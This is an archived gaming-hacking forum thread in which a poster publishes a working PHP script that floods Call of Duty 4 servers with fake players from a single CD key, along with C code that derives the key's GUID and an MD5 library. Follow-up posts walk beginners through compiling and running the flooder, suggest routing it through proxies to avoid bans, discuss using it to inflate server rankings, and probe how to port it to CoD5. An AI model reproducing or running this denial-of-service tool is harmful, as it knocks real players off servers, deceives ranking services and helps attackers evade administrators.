Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 13:11

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 121 posts ]  Go to page 1, 2, 3, 4, 5  Next
Author Message
 Post subject: Fake Player DoS -- COD4
PostPosted: 31 Jul 2008 12:48 

Joined: 16 Aug 2007 06:25
Posts: 367
General info: So there was a few threads about a CoD4 fake player DoS, and I decided to look into it. After playing around, I found that it's possible to flood a CoD4 server with fake players, with only 1 cd-key. Forgive me a new topic is annoying, but I figured it's better than hijacking some elses thread, and then having all this information get lost at the bottom :P.

Info about the fake players:
- They show in the server list, and all players will see them.
- Admins can see all the fake player's IP and GUID via server's console -- so they can ban you by either, be careful.
- 1 fake players lasts about 15 - 20 seconds before it times out. After timing out, a message shows in the server to all players, and in the server's console, that the player has timed out.

Information about my code:
- PHP (command line)
- It's probably sloppy, redundant, etc. Sorry! But it works. Feel free to modify it however you wish though if you are working on your own project.
- You will need to compile the key->guid C code (provided below) into an executable. This executable will be used by the php script to compute the GUID of the cd-key. I will not provide a compiled version because it's stupid to make people give their cd-key to an unknown executable file :P. The php script calls exec() on this executable with the cd-key, and the executable returns the guid of the cd-key needed for fake players. There is probably easier PHP code compute this (without having to use a binary), but I don't have the greatest knowledge of going from C to PHP so I can't do that yet. Sorry! Maybe someone else can.
Edit: I don't know why I didn't think about this, but you can just get your GUID via console or packet sniffing, and bypass the whole executable thing all together. The only disadvantage is you can't quickly change keys.
- Run it from the command line like so: php script.php server port cdkey
- The script sends an infinite amount of players until forcefully quit (CTRL+C).
- The command line will spit out a character or letter for each fake player attempt which has a meaning:
. (Fake player added to the server)
f (Server is currently full)
c (timeout after 1 second getting challenge from server)
n (Server replied with needcdkey, meaning the master server needs your cd-key again, so it was sent again)
b (cd-key is already in use by a fully-connected player somewhere else, or the cd-key is invalid)
u (server replied with an unknown response after requesting challenge. it should rarely do this, and it's not a big problem if it happens. some servers seem to send random garbage replies for whatever reason. this letter can also mean the server is offline.)
v (same as u, except this time the unknown reply happened after sending the connect string)

Pictures:
- Normal output (. means a fake player was added, f means the server was full, so the fake player DoS worked by sending fake players as needed. "v" was a hiccup along the way, must have been bad data):
Image
- Proof the server was filled with fake players:
Image
PHP Code:
Code:
<?php

   if (count($_SERVER['argv']) != 4) {

      echo ("\n\n" . "Check your arugments. Must start like:" . "\n" . "file.php cod4server cod4serverport key" . "\n\n");

   } else {

//generates a random string, in our case the fake players' names
   function random_letters ($numofletters=8) {
       $v="";
        for($i=0;$i<$numofletters;$i++) $v.=chr(rand(65,90));
        return $v;
   }

   $cod4masterserver = "cod4master.activision.com";
   $cod4masterserverport = "20800";
   $cod4server = $argv[1];
   $cod4serverport = $argv[2];
   $cod4key = $argv[3];
   $first16key = substr($cod4key, 0, 16);
   //path to the executable that calculates the guid from the cdkey. be sure to change this to fit your needs.
   $pbguid = exec("/home/user/cod4key2guid " . $first16key);
   $masterstring = "\xff\xff\xff\xffgetKeyAuthorize 0 " . $first16key . " PB " . $pbguid;
   $serverstring = "\xff\xff\xff\xff" . 'getchallenge 0 "' . $pbguid . '"';

   //Send master server the key once. If needed again, it will be sent again automatically
   $udpmaster = fsockopen("udp://" . $cod4masterserver, $cod4masterserverport);
   fwrite($udpmaster, $masterstring);

//begin sending infinite fake players. "stop" never changes from 0, so the loop continues forever (until you hit ctrl+c)
$stop = 0;
while($stop == 0){

   $fakeplayer = random_letters();
   $udpserverfirst = fsockopen("udp://" . $cod4server, $cod4serverport);
   fwrite($udpserverfirst, $serverstring);
   stream_set_timeout($udpserverfirst, 1);
   $udpserverfirstresponse = ''.fread($udpserverfirst, 1400);
   $udpserverfirstinfo = stream_get_meta_data($udpserverfirst);
   if ($udpserverfirstinfo['timed_out']) {
      echo("c");
   } else {
      if(substr($udpserverfirstresponse, 0, 21) != "\xff\xff\xff\xffchallengeResponse"){
         if($udpserverfirstresponse == "\xff\xff\xff\xffneedcdkey"){
            fwrite($udpmaster, $masterstring);
            echo ("n");
         } else {
            if($udpserverfirstresponse == "\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE"){
            echo ("b");
         } else {
            echo("u");
         }}
      } else {
         $challenge = substr($udpserverfirstresponse, 22, 20);
         $connectstring = ("\xff\xff\xff\xff" . 'connect "\\cg_predictItems\\1\\cl_anonymous\\0\\cl_punkbuster\\1\\cl_voice\\1\\cl_wwwDownload\\1\\rate\\25000\\snaps\\20\\name\\' . $fakeplayer . '\\protocol\\6\\challenge\\' . $challenge . '\\qport\\' . rand(10000, 65534) . '"');
         fwrite($udpserverfirst, $connectstring);
         $finalresponse = ''.fread($udpserverfirst, 1400);
         if ($finalresponse != "\xff\xff\xff\xffconnectResponse\x20"){
            if($finalresponse == "\xff\xff\xff\xfferror\x0aEXE_SERVERISFULL"){
            echo("f");
            } else {
            echo("v");
            }
         } else {
            echo ".";
         }}}}
}
?>


cod4key2guid.c
Code:
/*

   cod4key2guid
   by pierz 06/2008
   http://www.indahax.com

   modified by SomaFM to output only the guid

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "md5.c"

void cod4_md5_init(md5_context *pms) {

    pms->total[0] = pms->total[1] = 0;

   pms->state[0] = 0x6F1CD602;
    pms->state[1] = 0x226C74BE;
    pms->state[2] = 0xB31C088D;
    pms->state[3] = 0x555A9639;

}

int main(int argc, char *argv[]) {
    int             i,
                    x;
    md5_context     md5t;
    unsigned char   md5h[16],
                    guid[33];

    const char      *hex = "0123456789abcdef";

   if(argc < 2){

      printf("usage : ./c4key2guid <key>\n");
      return -1;

   }

   //minus char

   //just need 16 first byte
   for(i=0;i<16;i++)
      argv[1][i] = tolower(argv[1][i]);

   argv[1][16] = '\0';

    cod4_md5_init(&md5t);
    md5_update(&md5t, argv[1], strlen(argv[1]));
    md5_finish(&md5t, md5h);

    for(i = 0, x = 0; i < 16; i++) {
        guid[x++] = hex[md5h[i] >> 4];
        guid[x++] = hex[md5h[i] & 0xf];
    }
    guid[x] = 0;

    printf(guid);

   return(0);
}


md5.h (needed to compile cod4key2guid.c)
Code:
#ifndef _MD5_H
#define _MD5_H

#ifndef uint8
#define uint8  unsigned char
#endif

#ifndef uint32
#define uint32 unsigned long int
#endif

typedef struct
{
    uint32 total[2];
    uint32 state[4];
    uint8 buffer[64];
}
md5_context;

void md5_starts( md5_context *ctx );
void md5_update( md5_context *ctx, uint8 *input, uint32 length );
void md5_finish( md5_context *ctx, uint8 digest[16] );

#endif /* md5.h */


md5.c (needed to compile cod4key2guid.c)
Code:
/*
*  RFC 1321 compliant MD5 implementation
*
*  Copyright (C) 2001-2003  Christophe Devine
*
*  This program is free software; you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation; either version 2 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program; if not, write to the Free Software
*  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#include <string.h>

#include "md5.h"

#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        | ( (uint32) (b)[(i) + 1] <<  8 )       \
        | ( (uint32) (b)[(i) + 2] << 16 )       \
        | ( (uint32) (b)[(i) + 3] << 24 );      \
}

#define PUT_UINT32(n,b,i)                       \
{                                               \
    (b)[(i)    ] = (uint8) ( (n)       );       \
    (b)[(i) + 1] = (uint8) ( (n) >>  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) >> 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) >> 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;

}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
   
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );


    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx->total[0] & 0x3F;
    fill = 64 - left;

    ctx->total[0] += length;
    ctx->total[0] &= 0xFFFFFFFF;

    if( ctx->total[0] < length )
        ctx->total[1]++;

    if( left && length >= fill )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx->buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length >= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];

    high = ( ctx->total[0] >> 29 )
         | ( ctx->total[1] <<  3 );
    low  = ( ctx->total[0] <<  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    last = ctx->total[0] & 0x3F;
    padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx->state[0], digest,  0 );
    PUT_UINT32( ctx->state[1], digest,  4 );
    PUT_UINT32( ctx->state[2], digest,  8 );
    PUT_UINT32( ctx->state[3], digest, 12 );
}

#ifdef TEST

#include <stdlib.h>
#include <stdio.h>

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];

    if( argc < 2 )
    {
        printf( "\n MD5 Validation Tests:\n\n" );

        for( i = 0; i < 7; i++ )
        {
            printf( " Test %d ", i + 1 );

            md5_starts( &ctx );
            md5_update( &ctx, (uint8 *) msg[i], strlen( msg[i] ) );
            md5_finish( &ctx, md5sum );

            for( j = 0; j < 16; j++ )
            {
                sprintf( output + j * 2, "%02x", md5sum[j] );
            }

            if( memcmp( output, val[i], 32 ) )
            {
                printf( "failed!\n" );
                return( 1 );
            }

            printf( "passed.\n" );
        }

        printf( "\n" );
    }
    else
    {
        if( ! ( f = fopen( argv[1], "rb" ) ) )
        {
            perror( "fopen" );
            return( 1 );
        }

        md5_starts( &ctx );

        while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
        {
            md5_update( &ctx, buf, i );
        }

        md5_finish( &ctx, md5sum );

        for( j = 0; j < 16; j++ )
        {
            printf( "%02x", md5sum[j] );
        }

        printf( "  %s\n", argv[1] );
    }

    return( 0 );
}

#endif


Top
 Profile  
 
 
 Post subject:
PostPosted: 01 Aug 2008 05:56 

Joined: 16 Aug 2007 06:25
Posts: 367
A bit more info:

- It appears that spoofing the source address/port for your connect string will not work. If a source address/port requests to connect with a challenge that was not created by itself, the server will reply with EXE_BAD_CHALLENGE. So basically, the challenge is only good for the socket it was created on.

- A fix for this fake players DoS would be for the developers to make the game mark the key as globally in use (EXE_ERR_CDKEY_IN_USE) when the client sends the connect string. This would mean a malicious user would need a different key for each fake player.


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 06:29 

Joined: 26 Jul 2008 03:18
Posts: 9
:) i just tried it and it works :)


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 08:16 

Joined: 24 Jul 2008 16:36
Posts: 4
i appreciate ur hard work thanks a lot


Edit : could u plz tell me how to do it its hard for me to understand cuz my english is not that good .


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 08:31 

Joined: 26 Jul 2008 03:18
Posts: 9
SomaFM if i generate a key from a keygen i then use cod4key2guid, it works online?

i did try but i got 16 numbers what sould i do with the 16 numbers?

bye the way nice work


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 09:17 

Joined: 16 Aug 2007 06:25
Posts: 367
monstorrrr wrote:
SomaFM if i generate a key from a keygen i then use cod4key2guid, it works online?

i did try but i got 16 numbers what sould i do with the 16 numbers?

bye the way nice work


Keygen keys normally don't output keys that work online, but instead keys that match just the algorithm (to install the game or whatever). I'm not sure what you mean by "what sould i do with the 16 numbers". The first 16 characters of the cd-key is used to generate the GUID which is needed in the connection process. The script automatically gets the first 16 of your key for you, and passes it onto the executable which generates your guid, so you don't need to worry about that.

united wrote:
i appreciate ur hard work thanks a lot


Edit : could u plz tell me how to do it its hard for me to understand cuz my english is not that good .


1) Compile the cod4key2guid executable using GCC. You can get GCC by installing dev-cpp. First make sure cod4key2guid.c, md5.h, and md5.c are all in the same folder, and then compile it from the command line. Example:
cd C:\Dev-Cpp\bin
gcc c:\code\cod4key2guid.c -o c:\cod4key2guid.exe


2) Change the following line in the php source:
$pbguid = exec("/home/user/cod4key2guid " . $first16key);

to match where your cod4key2guid.exe file is. For example:

$pbguid = exec("c:\\cod4key2guid.exe " . $first16key);

3) Navigate to your php executable via command line (this is a php-cli script afterall):
cd c:\php

4) run the script:
php c:\cod4flooder.php server port cdkey


Alternative (and probably easier) way:

- If you don't plan on using multiple keys, you can skip steps 1 and 2, and just replace the following line:
$pbguid = exec("/home/user/cod4key2guid " . $first16key);

with

$pbguid = "1234567890abcdef1234567890abcdef";

where 1234567890abcdef1234567890abcdef is your guid.


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 10:20 

Joined: 26 Jul 2008 03:18
Posts: 9
ok. lets see that i have 1 key i whant to play with that key on 5 pc on the same time. who i do that?


Top
 Profile  
 
 Post subject:
PostPosted: 03 Aug 2008 10:31 

Joined: 16 Aug 2007 06:25
Posts: 367
monstorrrr wrote:
ok. lets see that i have 1 key i whant to play with that key on 5 pc on the same time. who i do that?


That's irrelevant to what this thread is about, and I don't think it would be easy if it were possible (at least for online servers).


Top
 Profile  
 
 Post subject:
PostPosted: 04 Aug 2008 13:22 

Joined: 24 Jul 2008 16:36
Posts: 4
how could i create " cod4flooder.php " script :S

sorry for being a noob


Top
 Profile  
 
 Post subject:
PostPosted: 04 Aug 2008 14:21 

Joined: 16 Aug 2007 06:25
Posts: 367
Open a text editor (notepad), copy the code into it, save the file as cod4flooder.php


Top
 Profile  
 
 Post subject:
PostPosted: 12 Aug 2008 03:03 

Joined: 27 Jun 2008 07:41
Posts: 27
Say if somebody wanted to get their rank up on a server, would this tool seeing how it is able to log in everybody to the server.. could it possibly add time to the server and thereby increase its rank.

Thanks


Top
 Profile  
 
 Post subject:
PostPosted: 12 Aug 2008 03:09 

Joined: 16 Aug 2007 06:25
Posts: 367
tictacman08 wrote:
Say if somebody wanted to get their rank up on a server, would this tool seeing how it is able to log in everybody to the server.. could it possibly add time to the server and thereby increase its rank.

Thanks


I'm confused as to what you're asking. Do you mean will this script increase a server's "rank", because it will appear to have more players all the time?

If that is the question, then I would say it depends on who is ranking the server, and how their ranking algorithm works. Say it was game-monitor... well then yes it would probably increase the rank because I'm sure player count is a factor they take into account. But I could never be 100% certain without seeing how they do it.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 31 Aug 2008 18:03 

Joined: 31 Aug 2008 17:48
Posts: 3
hey, great find. hopefully i can put this together and use this.

edit: having trouble with this.
what if i pmed you a extra cdkey, would you be able to compile it?


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 00:58 

Joined: 16 Aug 2007 06:25
Posts: 367
Grassi wrote:
hey, great find. hopefully i can put this together and use this.

edit: having trouble with this.
what if i pmed you a extra cdkey, would you be able to compile it?


There is no compiling this particular script into an executable, you will have to re-write the code into another language if you want it in that form (unless someone knows of a php compiler that I am not aware of, but I have never heard of such a thing that actually works). But it's really pretty easy to get it running. You do have to compile the "cod4key2guid" program if you want the ability to use raw cd-keys (instead of the guid).

But if you know how to find your cd-key's guid, you can use my "Alternative (and probably easier) way" that I mentioned in a previous post to where no compiling is required. Where exactly are you running into trouble though?


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 02:59 

Joined: 31 Aug 2008 17:48
Posts: 3
Well, I'm confused. So, I need to compile cod4key2guid program along with md5.c and md5.h? I will post screenshots too if it will help me explain.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 03:57 

Joined: 16 Aug 2007 06:25
Posts: 367
Grassi wrote:
Well, I'm confused. So, I need to compile cod4key2guid program along with md5.c and md5.h? I will post screenshots too if it will help me explain.


If you know you will be using just 1 cd-key, you don't even have to worry about compiling cod4key2guid. Just replace
$pbguid = exec("/home/user/cod4key2guid " . $first16key);
with
$pbguid = "1234567890abcdef1234567890abcdef";

in the php script. Make sure to replace 1234567890abcdef1234567890abcdef with your cd-key's GUID (which can be found in console using pb_myguid after connecting to a server). Then just run the script using php in the command line like so: php cod4.php serverip port cdkey

The files cod4key2guid.c, md5.c, and md5.h are all un-needed if you plan to use just 1 cd-key.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 17 Sep 2008 22:28 

Joined: 27 Jun 2008 07:41
Posts: 27
Hey Soma,

Thanks for the reply.

In regards to server ranking, most sites "rank" servers by the amount of time users spend on their server. What I'm asking is that if it were possible to flood say an empty server for 24 hours. If the server was "full" for 24 hours the server rank would go up because its very popular.

Popular servers appear at the top of the list, so you can potentially get real people in. I was just curious if this fake player script can manipulate player data like that.

- The system monitoring the server is: GameTracker and Game Monitor.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 18 Sep 2008 00:27 

Joined: 16 Aug 2007 06:25
Posts: 367
tictacman08 wrote:
Hey Soma,

Thanks for the reply.

In regards to server ranking, most sites "rank" servers by the amount of time users spend on their server. What I'm asking is that if it were possible to flood say an empty server for 24 hours. If the server was "full" for 24 hours the server rank would go up because its very popular.

Popular servers appear at the top of the list, so you can potentially get real people in. I was just curious if this fake player script can manipulate player data like that.

- The system monitoring the server is: GameTracker and Game Monitor.


Yes, when the CoD4 servers are queried the fake players show up as active players in the server (unlike a BF2 fake player dos). However, I don't know of a way to keep the SAME players in there (since the fake players drop after 20 seconds), so the players will always have different names, but the server will appear to always be full.

I'm not sure if you care about the same players being in there, or if you just want to have a full server. Hope that helps.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 31 Oct 2008 22:46 

Joined: 31 Oct 2008 22:40
Posts: 2
Hey how can i get the new udp packet info for the new cod5 beta so i can flood the servers anytips, they have changed since cod4 but i have noticed it is still linking back to the cod4masterserver i need help.

tried using cod4 dos didnt work just kept getting v's outputting

to get cod5 beta just register on the offical site a key will be sent to you.

Update: Tried using wireshark to scan for udp didnt work hmm will try a few other programs.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 15:54 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
wireshark sucks big time. use commview, best packet editor ive seen so far.
you even don't need any filtering in version 6 and above. you can simply enable process filtering, so it caputres packets only sent and/or recieved by that process.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 16:00 

Joined: 16 Aug 2007 06:25
Posts: 367
I tried the beta, and it looks like they added/changed some things:

- The cod4key2guid doesn't generate the correct guid for the getchallenge string in cod5; however, you could just locate your guid with a packet scan and use it (like shown in my previous posts for cod4). Someone will probably have to reverse how it's done again if the key>guid feature is wanted.
- The challengeResponse string is now 9 numbers, a space, and an additional string. It ends up looking like "123456789 ABokJjzbp6H=". I don't know what the additional string is used for.
- Protocol was changed to 1982 in the connect string.
- There are 2 additional fields in the connect string called bdTicket and bdTicketTime. I have no idea what these are, or how to generate them, but it looks like they are required to be 'accurately' generated or you will get error replies.

I think if we can just figure out how to generate bdTicket and bdTicketTime fields, a flooder is possible for cod5. I did some tweaking with the script, but kept running into the EXE_BAD_CHALLENGE error according to my packet scans. That's all I have for the moment =(

Edit: After looking a little further, after the server sends the challengeResponse packet, the client then makes a TCP connection to a separate server (cod5-pc-beta.auth.mmp3.demonware.net) and sends encrypted data to that server. This 'auth server' then replies with encrypted data. Then the communication with the game server then continues on with the connect string. So this 'auth server' probably plays a big role in connecting. It seems they have upped the complexity of the protocol quite a bit, so it will definitely take some good reversing :P


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 20:22 

Joined: 31 Oct 2008 22:40
Posts: 2
Nice good work SomaFM you are very smart.

am gonna have a fiddle about see what i can find in the next few days i need to backup my data and format before i do anything tho my pc is playing up ahh well.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 29 Dec 2008 23:48 

Joined: 27 Jun 2008 07:41
Posts: 27
Hello,

I was able to get the program to work although I have a question.. Can this program be run through a proxy?

Thanks


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 30 Dec 2008 16:45 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
everything can be run thru a proxy, use either sockscap or proxyfirewall.
both are free and both can run any program thru a proxy (just google).


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 30 Dec 2008 18:16 

Joined: 27 Jun 2008 07:41
Posts: 27
Alright thank you ! :D


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 07 Jan 2009 23:24 

Joined: 07 Jan 2009 23:19
Posts: 13
I'm actually confused on this. Will this allow people to join? Lets say, you have a server of 40, and its full. Is there a way to make it cut off a few like open 3-5 slots so people can see there's room and join? Then from there, when one actual player joins, it'll kick one fake player out?

Another question. Will this work for COD5? I've seen the fake connecting bots on a server I used to play on, but the clan broke apart and all of the servers on COD5, COD4, TF2, and a couple others all shut down.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 04:42 

Joined: 16 Aug 2007 06:25
Posts: 367
Evo916 wrote:
I'm actually confused on this. Will this allow people to join? Lets say, you have a server of 40, and its full. Is there a way to make it cut off a few like open 3-5 slots so people can see there's room and join? Then from there, when one actual player joins, it'll kick one fake player out?

Another question. Will this work for COD5? I've seen the fake connecting bots on a server I used to play on, but the clan broke apart and all of the servers on COD5, COD4, TF2, and a couple others all shut down.


You could probably modify the script to query the server's current player amount, and have an if statement to only allow X amount of fake players to join based on how many are already in there. When that limit is reached, stop adding fake players. For example, you want 4 free slots in a 40 man server:

Quote:
if($currentplayers >= 36){
echo ("did nothing, too many players");
} else {
//add your code here for a fake player
}


But this script is probably not what you want. These fake players timeout on their own, so there's no way to "kick" them unless you're an admin. Also, it might be difficult to detect a fake player VS a real player with just the script alone. You're probably best off looking for some type of server-side mod that can add X amount of "bots", and remove 1 each time a real player connects. Though I'm not sure if one exists for CoD4 or 5 :(. The script in this thread is mainly for flooding a server with fake players, disallowing anyone to join.

Also, this script will not work for CoD5 as far as I know (tried the CoD5 demo and got confused). I downloaded the retail game, and have been meaning to test it out and see the new connect packets to see if I can figure it out again. Just need to get motivated to sit down and try it out :P


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 05:38 

Joined: 07 Jan 2009 23:19
Posts: 13
